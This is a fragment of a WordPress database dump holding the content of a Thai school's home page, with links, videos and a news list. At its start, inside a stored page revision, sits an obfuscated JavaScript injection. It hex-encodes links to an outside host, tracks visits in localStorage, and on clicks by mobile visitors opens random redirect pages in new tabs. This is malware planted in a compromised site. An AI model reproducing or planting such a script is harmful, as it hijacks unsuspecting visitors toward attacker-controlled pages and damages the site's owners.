_0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-30 10:13:18','2024-08-30 03:13:18','',19,'http://watprato.ssk.in.th/?p=299',0,'revision','',0),
(300,2,'2024-08-30 10:13:32','2024-08-30 03:13:32','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":4,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"b0641f20\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":260,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" class=\"wp-image-260\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container 